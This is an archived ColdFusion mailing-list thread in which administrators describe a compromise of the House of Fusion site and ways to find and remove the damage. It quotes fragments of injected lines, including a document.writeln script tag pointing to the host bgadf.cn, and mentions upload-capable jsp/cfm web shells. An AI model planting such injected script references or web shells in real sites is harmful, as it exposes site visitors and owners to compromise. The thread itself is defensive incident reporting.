OK, here's what to do. Search your entire code base for any web accessible script containing the text "chanm". I found a jsp and a cfm file, both with the ability to upload and manipulate files on a server. If you do find a file like this, please send me the code so I can compare it to what I have and get a better search pattern. ~| Want to reach the ColdFusion community with something they want? Let them know on the House of Fusion mailing lists Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326398 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4
Re: malware patterns
I've seen this sort of attack before on a client's server that they were hosting at their office. The malware that did it used a stolen FTP password to log in as an actual user and modify every HTML file on their server. We found it be reviewing the FTP server logs and saw that their general user account was downloading and uploading the modified files, as well as searching for files with specific extensions (.html, .php, etc). I know the FileZilla FTP server does support IP restrictions, so maybe consider implementing those if you haven't already to only allow your IP to access it. Just a thought! Warm regards, Jordan Michaels Vivio Technologies http://www.viviotech.net/ Open BlueDragon Steering Committee Adobe Solution Provider Michael Dinowitz wrote: > The recent attack on House of Fusion resulted in some useful > information as to what you should look for. In general, all or most of > the files with the following extensions were affected: > .cfm > .cfml > .htm > .html > .js > The following line of code was prepended to all files other than .js > http://bgadf.cn> > This was added to both unencrypted and encrypted files, meaning the > cfide was affected. Luckily, the line was exactly as stated above with > a new line after it. This allows for a global find/replace to remove > it. Unfortunately, this seems to have killed my cfide/administrator, > requiring me to replace it with a copy from another machine. > The .js files had the following line of code added: > document.writeln ("http://bgadf.cn\";><\/script>"); > Again, a search and replace was able to remove it across the board. An > important note is that the .js files in the cfide (the ajax files) > were affected and had to be repaired. > Finally, the following line of code was buried within at least one file: >